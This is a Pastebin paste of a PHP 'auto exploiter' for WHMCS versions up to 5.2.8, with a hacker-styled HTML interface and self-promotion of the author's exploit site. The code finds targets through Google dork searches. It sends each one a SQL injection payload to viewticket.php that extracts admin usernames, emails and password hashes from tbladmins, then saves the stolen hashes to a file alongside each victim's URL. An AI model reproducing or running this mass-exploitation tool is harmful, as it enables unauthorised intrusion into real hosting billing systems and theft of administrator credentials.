Advertisement
t3hg00n

WHMCS 0day Auto Exploiter <= 5.2.8

Oct 19th, 2013
31,055
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 8.21 KB | None | 0 0
  1. <?php
  2. /*
  3. *****************************************************
  4.         WHMCS 0day Auto Exploiter <= 5.2.8
  5.         Coded by g00n - Skype: t3hg00n
  6.             wwww.xploiter.net
  7. *****************************************************
  8. Preview:
  9. http://i.imgur.com/qB726Gm.png
  10. In action:
  11. http://i.imgur.com/oNpZAf6.png
  12. http://i.imgur.com/gFlBjtD.png
  13. *****************************************************
  14. */
  15.  
  16. set_time_limit(0);
  17. ini_set('memory_limit', '64M');
  18. header('Content-Type: text/html; charset=UTF-8');
  19. function letItBy(){ ob_flush(); flush(); }
  20. function getAlexa($url)
  21. {
  22.     $xml = simplexml_load_file('http://data.alexa.com/data?cli=10&dat=snbamz&url='.$url);
  23.     $rank1 = $xml->SD[1];
  24.     if($rank1)
  25.         $rank = $rank1->POPULARITY->attributes()->TEXT;
  26.     else
  27.         $rank = 0;
  28.     return $rank;
  29. }
  30.    
  31. function google_that($query, $page=1)
  32. {
  33.     $resultPerPage=8;
  34.     $start = $page*$resultPerPage;
  35.     $url = "http://ajax.googleapis.com/ajax/services/search/web?v=1.0&hl=iw&rsz={$resultPerPage}&start={$start}&q=" . urlencode($query);
  36.     $resultFromGoogle = json_decode( http_get($url, true) ,true);
  37.     if(isset($resultFromGoogle['responseStatus'])) {
  38.         if($resultFromGoogle['responseStatus'] != '200') return false;
  39.         if(sizeof($resultFromGoogle['responseData']['results']) == 0) return false;
  40.         else return $resultFromGoogle['responseData']['results'];
  41.     }
  42.     else
  43.         die('The function <b>' . __FUNCTION__ . '</b> Kill me :( <br>' . $url );
  44. }
  45.    
  46. function http_get($url, $safemode = false){
  47.     if($safemode === true) sleep(1);
  48.     $im = curl_init($url);
  49.     curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
  50.     curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
  51.     curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
  52.     curl_setopt($im, CURLOPT_HEADER, 0);
  53.     return curl_exec($im);
  54.     curl_close();
  55. }
  56.  
  57. function check_vuln($url) {
  58. $url = dirname($url) . '/viewticket.php';
  59. $url = str_replace("/admin","",$url);
  60.  
  61. $post = "tid[sqltype]=TABLEJOIN&tid[value]=-1 union select 1,0,0,0,0,0,0,0,0,0,0,(SELECT GROUP_CONCAT(0x3a3a3a3a3a,id,0x3a,username,0x3a,email,0x3a,password,0x3a3a3a3a3a) FROM tbladmins),0,0,0,0,0,0,0,0,0,0,0#";
  62. $curl_connection = curl_init($url);
  63. if($curl_connection != false) {
  64.     curl_setopt($curl_connection, CURLOPT_CONNECTTIMEOUT, 30);
  65.     curl_setopt($curl_connection, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)");
  66.     curl_setopt($curl_connection, CURLOPT_RETURNTRANSFER, true);
  67.     curl_setopt($curl_connection, CURLOPT_SSL_VERIFYPEER, false);
  68.     curl_setopt($curl_connection, CURLOPT_FOLLOWLOCATION, 1);
  69.     curl_setopt($curl_connection, CURLOPT_POSTFIELDS, $post);
  70.     $source = curl_exec($curl_connection);
  71.     preg_match_all('/:::::(.*?):::::/s',$source,$infoz);
  72.     if($infoz[0]) {
  73.         return $infoz[0];
  74.     }
  75.     else
  76.         return "Fail!";
  77. }
  78. else
  79.     return "Fail!";
  80. }
  81. ?>
  82. <html>
  83. <head>
  84. <title>WHMCS Auto Xploiter - by g00n</title>
  85. </head>
  86. <body style="background-image: url('http://i.imgur.com/zHNCk2e.gif'); background-repeat: repeat; background-position: center; background-attachment: fixed;">
  87.  
  88. <STYLE>
  89. textarea{background-color:#105700;color:lime;font-weight:bold;font-size: 20px;font-family: Tahoma; border: 1px solid #000000;}
  90. input{FONT-WEIGHT:normal;background-color: #105700;font-size: 15px;font-weight:bold;color: lime; font-family: Tahoma; border: 1px solid #666666;height:20}
  91. body {
  92. font-family: Tahoma
  93. }
  94. tr {
  95. BORDER: dashed 1px #333;
  96. color: #FFF;
  97. }
  98. td {
  99. BORDER: dashed 1px #333;
  100. color: #FFF;
  101. }
  102. .table1 {
  103. BORDER: 0px Black;
  104. BACKGROUND-COLOR: Black;
  105. color: #FFF;
  106. }
  107. .td1 {
  108. BORDER: 0px;
  109. BORDER-COLOR: #333333;
  110. font: 7pt Verdana;
  111. color: Green;
  112. }
  113. .tr1 {
  114. BORDER: 0px;
  115. BORDER-COLOR: #333333;
  116. color: #FFF;
  117. }
  118. table {
  119. BORDER: dashed 1px #333;
  120. BORDER-COLOR: #333333;
  121. BACKGROUND-COLOR: Black;
  122. color: #FFF;
  123. }
  124. input {
  125. border          : dashed 1px;
  126. border-color        : #333;
  127. BACKGROUND-COLOR: Black;
  128. font: 8pt Verdana;
  129. color: Red;
  130. }
  131. select {
  132. BORDER-RIGHT:  Black 1px solid;
  133. BORDER-TOP:    #DF0000 1px solid;
  134. BORDER-LEFT:   #DF0000 1px solid;
  135. BORDER-BOTTOM: Black 1px solid;
  136. BORDER-color: #FFF;
  137. BACKGROUND-COLOR: Black;
  138. font: 8pt Verdana;
  139. color: Red;
  140. }
  141. submit {
  142. BORDER:  buttonhighlight 2px outset;
  143. BACKGROUND-COLOR: Black;
  144. width: 30%;
  145. color: #FFF;
  146. }
  147. textarea {
  148. border          : dashed 1px #333;
  149. BACKGROUND-COLOR: Black;
  150. font: Fixedsys bold;
  151. color: #999;
  152. }
  153. BODY {
  154.     SCROLLBAR-FACE-COLOR: Black; SCROLLBAR-HIGHLIGHT-color: #FFF; SCROLLBAR-SHADOW-color: #FFF; SCROLLBAR-3DLIGHT-color: #FFF; SCROLLBAR-ARROW-COLOR: Black; SCROLLBAR-TRACK-color: #FFF; SCROLLBAR-DARKSHADOW-color: #FFF
  155. margin: 1px;
  156. color: Red;
  157. background-color: Black;
  158. }
  159. .main {
  160. margin          : -287px 0px 0px -490px;
  161. BORDER: dashed 1px #333;
  162. BORDER-COLOR: #333333;
  163. }
  164. .tt {
  165. background-color: Black;
  166. }
  167.  
  168. A:link {
  169.     COLOR: White; TEXT-DECORATION: none
  170. }
  171. A:visited {
  172.     COLOR: White; TEXT-DECORATION: none
  173. }
  174. A:hover {
  175.     color: Red; TEXT-DECORATION: none
  176. }
  177. A:active {
  178.     color: Red; TEXT-DECORATION: none
  179. }
  180.  
  181. #result{margin:10px;}
  182. #result span{display:block;}
  183. #result .Y{background-color:green;}
  184. #result .X{background-color:red;}
  185. </STYLE>
  186. <script language=\'javascript\'>
  187. function hide_div(id)
  188. {
  189.   document.getElementById(id).style.display = \'none\';
  190.   document.cookie=id+\'=0;\';
  191. }
  192. function show_div(id)
  193. {
  194.   document.getElementById(id).style.display = \'block\';
  195.   document.cookie=id+\'=1;\';
  196. }
  197. function change_divst(id)
  198. {
  199.   if (document.getElementById(id).style.display == \'none\')
  200.     show_div(id);
  201.   else
  202.     hide_div(id);
  203. }
  204. </script>
  205. </td></table></tr>
  206. <br>
  207. <br>
  208. <link rel="stylesheet" type="text/css" href="http://fonts.googleapis.com/css?family=Audiowide">
  209.     <style>
  210.       body {
  211.         font-family: 'Audiowide', serif;
  212.         font-size: 30px;
  213.        
  214.       }
  215.     </style>
  216.   </head>
  217.  
  218.   <body onLoad="type_text()" ; bgColor=#000000 text=#00FFFF background="Fashion fuchsia">
  219.     <center>
  220. <font face="Audiowide" color="red">WHMCS Auto Xploiter <font color="green">(0day)</font>
  221. <br>
  222. <font color="white" size="4">[For WHMCS ver. <= </font><font color="green" size="4">5.2.8</font><font color="white" size="4">]</font>
  223. </font>
  224. <br><br>
  225.  
  226. <table border=1 bordercolor=red>
  227. <tr>
  228. <td width="700">
  229. <br />
  230. <center>
  231.     <form method="post">
  232.         Google Dork: &nbsp;&nbsp;
  233.         <input type="text" id="dork" size="30" name="dork" value="<?php echo (isset($_POST['dork']{0})) ? htmlentities($_POST['dork']) : 'inurl:submitticket.php'; ?>" />
  234.         &nbsp;&nbsp;<input type="submit" value="Xploit!" id="button"/>
  235.     </form>
  236. <?php
  237.     if(isset($_POST['dork']{0})) {
  238.         $file = fopen("WMCS-Hashes.txt","a");
  239.         echo '<br /><div id="result"><b>Scanning has been started... Good luck! ;)</b><br><br>';           
  240.         letItBy();         
  241.         for($googlePage = 1; $googlePage <= 50; $googlePage++) {
  242.             $googleResult = google_that($_POST['dork'], $googlePage);
  243.             if(!$googleResult) {
  244.                 echo 'Finished scanning.';
  245.                 fclose($file);
  246.                 break;
  247.             }
  248.            
  249.             for($victim = 0; $victim < sizeof($googleResult); $victim++){
  250.                 $result = check_vuln($googleResult[$victim]['unescapedUrl']);
  251.                 $alexa = getAlexa($googleResult[$victim]['unescapedUrl']);
  252.                 if($result != "Fail!") {
  253.                     $hashes = "";
  254.                     foreach ($result as $record) {
  255.                         $hashes = $hashes . str_replace(':::::','',$record) . "\n";
  256.                     }
  257.                     $sep = "========================================================\n";
  258.                     $data = $sep . $googleResult[$victim]['unescapedUrl'] . " - Alexa: " .$alexa. "\n" . $sep . $hashes . "\n";
  259.                     fwrite($file,$data);
  260.                     echo "<br /><font color=\"green\">Successfully Xploited...</font>";
  261.                     echo '<span class="Y">';
  262.                     echo "<pre>" . $data . "</pre></span><br />";
  263.                    
  264.                 }
  265.                 else {
  266.                 echo '<span class="X">';
  267.                 echo "<a href=\"{$googleResult[$victim]['unescapedUrl']}\" target='_blank'>{$googleResult[$victim]['titleNoFormatting']}</a> - <font color=\"black\">Failed!</font>";
  268.                 echo "</span>\n<br />";
  269.                 }
  270.                 letItBy();
  271.             }
  272.         }
  273.         echo '</div>';
  274.     }
  275. ?>
  276. </center>
  277. </td>
  278. </table>
  279. <br /><br />
  280. <font face="Audiowide" color="red" size="2">
  281. Coded by: <font color="white">g00n</font> <font color="white">|</font> Skype: <font color="white"><a href="Skype:t3hg00n">t3hg00n</a></font><br /><br />
  282. <br > <font color="green">For more tools/scripts/exploits/etc.</font>
  283. <br />visit <a href="http://xploiter.net" target="_blank" style="text-decoration: none;">www.Xploiter.net</a>
  284. </font>
  285.  
  286. </center>
  287. </body>
  288. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement